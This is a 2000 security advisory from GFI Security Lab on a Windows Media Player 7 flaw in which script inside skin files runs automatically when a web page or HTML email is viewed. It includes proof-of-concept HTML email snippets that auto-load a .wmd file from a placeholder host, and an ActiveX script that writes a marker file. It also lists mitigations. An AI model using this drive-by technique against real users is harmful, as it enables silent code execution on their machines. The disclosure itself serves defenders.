188 lines
No EOL
4.4 KiB
Text
188 lines
No EOL
4.4 KiB
Text
----[Title:
|
|
|
|
[ GFISEC23112000 ] Microsoft Media Player 7 allows executation of
|
|
Arbitrary Code
|
|
|
|
|
|
|
|
|
|
----[Published:
|
|
|
|
23.NOV.2000
|
|
|
|
|
|
----[Vendor Status:
|
|
|
|
Microsoft has been informed and we have worked with them to release
|
|
a patch.
|
|
|
|
|
|
|
|
----[Systems Affected:
|
|
|
|
|
|
Windows ME (WMP7 is installed by default)
|
|
and 95,98 NT and 2000, using:
|
|
|
|
* Windows Media Player 7
|
|
|
|
and
|
|
|
|
* Internet Explorer 3+,
|
|
|
|
* Outlook Express 2000,
|
|
|
|
* Outlook Express 98,
|
|
|
|
* Outlook 2000,
|
|
|
|
* Outlook 98
|
|
|
|
* possibly all other HTML and/or
|
|
javascript enabled e-mail clients.
|
|
|
|
|
|
|
|
----[The problem:
|
|
|
|
|
|
GFI, developer of email content checking & network
|
|
security software, has recently discovered a security flaw
|
|
within Windows Media Player which allows a malicious user
|
|
to run arbitary code on a target machine as it attempts to
|
|
view a website or an HTML E-mail.
|
|
|
|
|
|
The problem is exploited by embedding a javascript (.js) file within a
|
|
Media Player skin file (.wmz) which can also be embeded in a Windows Media
|
|
Download file (.wmd). This does not require the user to run any attachments
|
|
since the Media Player file is automatically executed using a iframe tag
|
|
or a window.open() with in a <script> tag.
|
|
|
|
|
|
|
|
----[Proof of concept Exploit:
|
|
|
|
<Embedded within an HTML file or e-mail>
|
|
|
|
E-mail Example 1.
|
|
|
|
<head>
|
|
<script language="JavaScript">
|
|
<!--
|
|
function MM_openBrWindow(theURL,winName,features) { //v2.0
|
|
alert('This exploit will now open a new window\n
|
|
and automatically download the wmd file\n
|
|
and execute it. This will create a file named\n
|
|
gfiseclab.txt in your C:\\');
|
|
window.open(theURL,winName,features);
|
|
}
|
|
//-->
|
|
</script>
|
|
</head>
|
|
|
|
<body bgcolor="#FFFFFF"
|
|
|
|
onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
|
|
</Embedded within an HTML e-mail>
|
|
|
|
|
|
|
|
E-mail Example 2.
|
|
|
|
<html>
|
|
<body>
|
|
<script>
|
|
alert('This exploit will now open a new window \n and automatically download
|
|
the wmd file \n
|
|
|
|
and execute it. This will create a file named \n gfiseclab.txt in your
|
|
C:\\')</script>
|
|
<iframe src="http://website/test.wmd";></iframe></body>
|
|
</html>
|
|
|
|
-------------------------------------
|
|
|
|
|
|
|
|
test.wmd is a compressed zip file which contains the following files:
|
|
|
|
* test.asx: meta file which points to an mpg file and
|
|
the exploit skin file
|
|
|
|
* test.mpg: an example mpeg movie.
|
|
|
|
* test.wmz: the exploit skin file.
|
|
|
|
|
|
|
|
test.wmz is also a compressed zip file containing:
|
|
|
|
* test.js: our javascript which contains the following code
|
|
************************************
|
|
var fso, f1;
|
|
fso = new ActiveXObject("Scripting.FileSystemObject");
|
|
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
|
|
|
|
function onload(){
|
|
playAgain();
|
|
}
|
|
************************************
|
|
|
|
* test.wms: another metafile which calls test.js
|
|
|
|
-------------------------------------
|
|
|
|
|
|
----[Solution:
|
|
|
|
For e-mail the best solution is to apply filtering on incoming e-mails via
|
|
the SMTP server to filter WMD and WMZ files, disable javascript iframe tags,
|
|
|
|
meta refresh tags and possibly ActiveX tags. This means that users should
|
|
not worry about receiving malicious email and spreading worms etc.
|
|
|
|
|
|
Consider unregistering .wmd and .wmz so from being associated with Media
|
|
Player 7 until a vendor patch is applied. Procedure:
|
|
|
|
In Windows Explorer click on View>Options>File Types and delete the
|
|
following entries:
|
|
|
|
|
|
* Windows Media Player Skin Package.
|
|
|
|
* Windows Media Player Download Package.
|
|
|
|
|
|
|
|
This should provide some better protection.
|
|
|
|
|
|
|
|
----[Reference:
|
|
|
|
http://www.gfi.com/press/memp7exploitpr.htm
|
|
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
|
|
|
|
|
|
|
|
----[Contact Information:
|
|
|
|
Sandro Gauci
|
|
GFI Security Lab
|
|
sandro@xxxxxxx
|
|
http://www.gfi.com
|
|
|
|
|
|
|
|
|
|
|
|
|
|
source: https://www.securityfocus.com/bid/1976/info
|
|
|
|
Windows Media Player is an application used for digital audio, and video content viewing.
|
|
|
|
It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the Active X component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site.
|
|
|
|
Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user. |